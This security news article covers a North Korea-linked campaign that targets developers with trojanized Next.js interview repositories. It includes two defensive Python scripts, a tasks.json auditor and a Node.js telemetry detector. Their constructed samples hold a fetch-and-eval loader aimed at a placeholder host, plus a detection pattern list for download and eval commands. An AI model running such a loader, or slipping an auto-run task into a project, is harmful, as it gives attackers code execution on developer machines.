Attackers are currently targeting developers through malicious Next.js repositories, aiming to perform remote code execution and establish a persistent command-and-control channel on infected machines. This campaign is believed to be linked to North Korea's fraudulent job recruitment scams.
Microsoft has raised concerns about this threat, which involves the distribution of malicious repositories disguised as legitimate Next.js projects and technical assessment materials. Researchers from Microsoft Defender and the Microsoft Defender Security Research Team have identified several Trojanized repositories that provide various pathways for delivering a backdoor to compromise developer systems.
According to a recent blog post by the Microsoft security teams, "The campaign uses multiple entry points that converge on the same outcome: runtime retrieval and local execution of attacker-controlled JavaScript that transitions into staged command-and-control."
While the researchers did not explicitly attribute the campaign to North Korea, they noted that the activity aligns with a broader group of threats that use job-themed lures to blend into routine developer workflows. This cluster of attacks is associated with North Korea's Lazarus APT. The blog post also references earlier third-party research on North Korean APT activities related to Microsoft Visual Studio Code. For years, North Korean actors have persistently targeted developers by offering fake job opportunities, which often involve participating in sample development challenges that lead to the delivery of malicious code.
The blog post further highlights how a recruiting-themed "interview project" can seamlessly turn into a reliable method for remote code execution by blending into standard developer tasks, such as opening a repository, running a development server, or starting a backend.
The ultimate goal of this campaign is to execute code on developer systems that typically house valuable assets, including source code, environment secrets, and access to build or cloud resources. This activity emphasizes how developer workflows represent a primary attack surface for cyber espionage and other activities that could compromise the entire software supply chain.
Repositories Leading to Backdoor Activity
The researchers uncovered this campaign when Microsoft Defender flagged suspicious outbound connections from Node.js processes to infrastructure controlled by attackers, subsequently tracing the activity back to Next.js repositories exhibiting similar malicious behavior. Next.js is a widely used open-source web development framework maintained by the cloud software vendor Vercel.
The malicious repositories initiate one of two execution paths that establish a lightweight registration stage to identify the host and bootstrap code. These eventually lead to runtime retrieval and in-memory execution of attacker-controlled JavaScript, creating a persistent command-and-control connection for delivering additional payloads and exfiltrating data from compromised systems.
Some repositories exploit Visual Studio Code workspace automation by including a .vscode/tasks.json file configured to execute tasks automatically upon opening a trusted workspace. This triggers a fetch-and-execute loader sequence via Node.js. Others embed obfuscated malicious code directly into development assets, allowing it to decode and fetch additional payloads when a developer runs typical build commands or launches a development server.
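The workspace-automation path described above hinges on one setting: a task in .vscode/tasks.json whose runOptions.runOn is "folderOpen" starts as soon as the folder is opened in a trusted workspace. The following audit script is an added example written for this article, not code from Microsoft or from the repositories it describes; it parses a repository's tasks.json (which is JSONC, so comments are stripped first), reports which tasks auto-run on folder open, and flags command lines that contain download tools, URLs, or inline code evaluation. The sample tasks.json and the example.invalid host are constructed, and the pattern list is a starting point to tune, not a complete signature set.

```python
"""Audit a repository's .vscode/tasks.json for tasks that run on folder open
and for commands that fetch or evaluate remote code.

Added example for this article; not code from Microsoft or from the campaign.
The sample tasks.json below is constructed; example.invalid is a placeholder.
"""
import json
import re
from typing import Any

# Command fragments worth reviewing when they appear in an auto-started task.
# Each entry is a case-insensitive regex matched against the flattened command line.
SUSPICIOUS_PATTERNS = [
    r"\bnode\b.*\s-e\b",                              # inline JavaScript evaluation
    r"\bcurl\b|\bwget\b|Invoke-WebRequest|\biwr\b",   # download tools
    r"https?://",                                     # any remote URL in a task
    r"\beval\b|new\s+Function\s*\(",                  # runtime code evaluation
    r"\bbase64\b|atob\s*\(|Buffer\.from\([^)]*base64",  # decoding an embedded payload
    r"\bchild_process\b|\bexecSync\b",                # spawning processes from Node
]

# Matches a JSON string literal (kept) or a // or /* */ comment (dropped).
_JSONC_RE = re.compile(r'("(?:\\.|[^"\\])*")|//[^\n]*|/\*.*?\*/', re.S)


def strip_jsonc_comments(text: str) -> str:
    """tasks.json is JSONC: remove comments while leaving string literals intact.
    Trailing commas, which VS Code also tolerates, are not handled here."""
    return _JSONC_RE.sub(lambda m: m.group(1) or "", text)


def task_command_line(task: dict[str, Any]) -> str:
    """Flatten a task's command and args into one string for pattern matching.
    Accepts plain strings and VS Code's {"value": ..., "quoting": ...} form."""
    parts = []
    for item in [task.get("command")] + list(task.get("args") or []):
        if isinstance(item, dict):
            item = item.get("value", "")
        if item:
            parts.append(str(item))
    return " ".join(parts)


def audit_tasks_json(text: str) -> list[dict[str, Any]]:
    """Return one finding per task: whether it auto-runs on folder open and which
    suspicious patterns its command line matches, with a simple severity."""
    data = json.loads(strip_jsonc_comments(text))
    findings = []
    for task in data.get("tasks", []):
        auto_run = (task.get("runOptions") or {}).get("runOn") == "folderOpen"
        cmdline = task_command_line(task)
        hits = [p for p in SUSPICIOUS_PATTERNS if re.search(p, cmdline, re.I)]
        # Highest concern: starts without user action AND reaches out or evals code.
        if auto_run and hits:
            severity = "high"
        elif auto_run or hits:
            severity = "medium"
        else:
            severity = "none"
        findings.append({
            "label": task.get("label", "<unnamed>"),
            "auto_run": auto_run,
            "suspicious_patterns": hits,
            "severity": severity,
        })
    return findings


# Constructed sample: one ordinary dev-server task and one auto-running loader.
SAMPLE_TASKS_JSON = r'''{
  // VS Code tasks (constructed example)
  "version": "2.0.0",
  "tasks": [
    {
      "label": "dev",
      "type": "shell",
      "command": "npm run dev"
    },
    {
      "label": "setup",
      "type": "shell",
      "command": "node",
      "args": ["-e", "fetch('https://example.invalid/s').then(r=>r.text()).then(eval)"],
      "runOptions": { "runOn": "folderOpen" }
    }
  ]
}'''

if __name__ == "__main__":
    for f in audit_tasks_json(SAMPLE_TASKS_JSON):
        print(f"{f['severity']:6} {f['label']:8} auto_run={f['auto_run']} "
              f"hits={len(f['suspicious_patterns'])}")
```

Run against a cloned repository before opening it in the IDE, the "dev" task reports no concern while the "setup" task is rated high: it is wired to folder open and its command line contains an inline Node.js evaluation, a remote URL and a call to eval. VS Code only honours folderOpen tasks inside a trusted workspace and when automatic tasks are allowed, which is why the IDE trust policies the article recommends are the primary control; this check is the complementary pre-open review.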
Developer Attacks Rage On
North Korean cyberspies have been targeting developers with fake job opportunities since at least 2021, when security researchers identified the "Dream Jobs" campaign. This campaign involved sending fake job offers that linked to malicious web files. Over time, the attacks have evolved into more sophisticated social engineering tactics, luring developers into participating in fake development projects or recruitment challenges that deliver spyware and other forms of malware.
The recent discovery of weaponized Next.js repositories underscores the commitment of threat actors to target developers, not only to establish a spy channel but also to compromise the software supply chain as a whole. To defend against these threats, security operations teams and DevSecOps leaders are advised to treat developer workflows as a privileged attack surface. They should integrate IDE trust policies, behavioral analytics, and continuous monitoring into broader threat detection and response programs.
Organizations can enhance their defenses by enforcing strict trust policies for IDEs like Visual Studio Code, deploying attack surface reduction rules via Microsoft Defender for Endpoint to limit risky script execution behaviors, and prioritizing visibility into unexpected Node.js execution patterns and anomalous outbound connections from developer endpoints.
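The last recommendation, visibility into unexpected Node.js execution and outbound connections, can be expressed as a small correlation rule. The script below is an added example written for this article, not Microsoft's detection logic and not a Defender query: it joins process-start and network-connect events by process id, keeps only Node.js processes, and alerts when they contact hosts outside an allowlist of expected development destinations, raising severity when the parent is the IDE (the tasks.json auto-run path) or the command line runs inline code with node -e. The JSON-lines telemetry shape, the field names and all sample events are constructed, and the example.invalid hosts are placeholders.

```python
"""Flag Node.js processes on developer endpoints whose outbound connections fall
outside expected development destinations.

Added example for this article, not Microsoft's detection logic. The telemetry
format (JSON lines with the fields used below) and all sample events are
constructed; hosts under example.invalid are placeholders.
"""
import json
from collections import defaultdict

# Destinations a local Next.js workflow is expected to reach. Assumption: tune
# this to your own registry mirrors and internal services.
EXPECTED_HOSTS = {"registry.npmjs.org", "localhost", "127.0.0.1", "::1"}
NODE_IMAGES = {"node", "node.exe"}
IDE_IMAGES = {"code", "code.exe", "code-insiders"}


def analyse_events(lines):
    """Correlate process_start and network_connect events by pid and return
    alerts for Node.js processes that contacted unexpected hosts."""
    procs = {}                 # pid -> process_start event
    conns = defaultdict(list)  # pid -> list of network_connect events
    for line in lines:
        ev = json.loads(line)
        if ev["type"] == "process_start":
            procs[ev["pid"]] = ev
        elif ev["type"] == "network_connect":
            conns[ev["pid"]].append(ev)

    alerts = []
    for pid, events in conns.items():
        proc = procs.get(pid)
        if not proc or proc["image"].lower() not in NODE_IMAGES:
            continue
        unexpected = sorted({e["dst_host"] for e in events
                             if e["dst_host"] not in EXPECTED_HOSTS})
        if not unexpected:
            continue
        parent_image = procs.get(proc["ppid"], {}).get("image", "").lower()
        reasons = ["node.js process contacted unexpected host(s)"]
        if parent_image in IDE_IMAGES:
            reasons.append("spawned directly by the IDE (possible tasks.json auto-run)")
        if " -e " in f" {proc['cmdline']} ":
            reasons.append("inline script execution (node -e)")
        alerts.append({
            "pid": pid,
            "cmdline": proc["cmdline"],
            "hosts": unexpected,
            "reasons": reasons,
            "severity": "high" if len(reasons) > 1 else "medium",
        })
    return alerts


# Constructed telemetry: an IDE that spawns a Node.js loader, a normal dev
# server started from a shell, and a postinstall script calling out.
SAMPLE_TELEMETRY = [json.dumps(e) for e in [
    {"type": "process_start", "pid": 100, "ppid": 1, "image": "code",
     "cmdline": "code /home/dev/interview-project"},
    {"type": "process_start", "pid": 400, "ppid": 1, "image": "bash",
     "cmdline": "bash"},
    {"type": "process_start", "pid": 200, "ppid": 100, "image": "node",
     "cmdline": "node -e fetch('https://stage.example.invalid/s').then(r=>r.text()).then(eval)"},
    {"type": "process_start", "pid": 300, "ppid": 400, "image": "node",
     "cmdline": "node node_modules/.bin/next dev"},
    {"type": "process_start", "pid": 500, "ppid": 400, "image": "node",
     "cmdline": "node scripts/postinstall.js"},
    {"type": "network_connect", "pid": 200, "dst_host": "stage.example.invalid", "dst_port": 443},
    {"type": "network_connect", "pid": 300, "dst_host": "localhost", "dst_port": 3000},
    {"type": "network_connect", "pid": 300, "dst_host": "registry.npmjs.org", "dst_port": 443},
    {"type": "network_connect", "pid": 500, "dst_host": "cdn.example.invalid", "dst_port": 443},
]]

if __name__ == "__main__":
    for a in analyse_events(SAMPLE_TELEMETRY):
        print(f"{a['severity']:6} pid={a['pid']} hosts={a['hosts']}")
        for r in a["reasons"]:
            print(f"       - {r}")
```

On the constructed events, the dev server (pid 300) stays silent because it only reaches localhost and the npm registry, the IDE-spawned inline loader (pid 200) is rated high on three grounds, and the postinstall script (pid 500) is rated medium because its only anomaly is the unexpected destination. In production the same join runs over EDR process and network events; the allowlist is the tuning knob, and the IDE-parent and node -e conditions are what separate the workspace-automation path from routine Node.js activity.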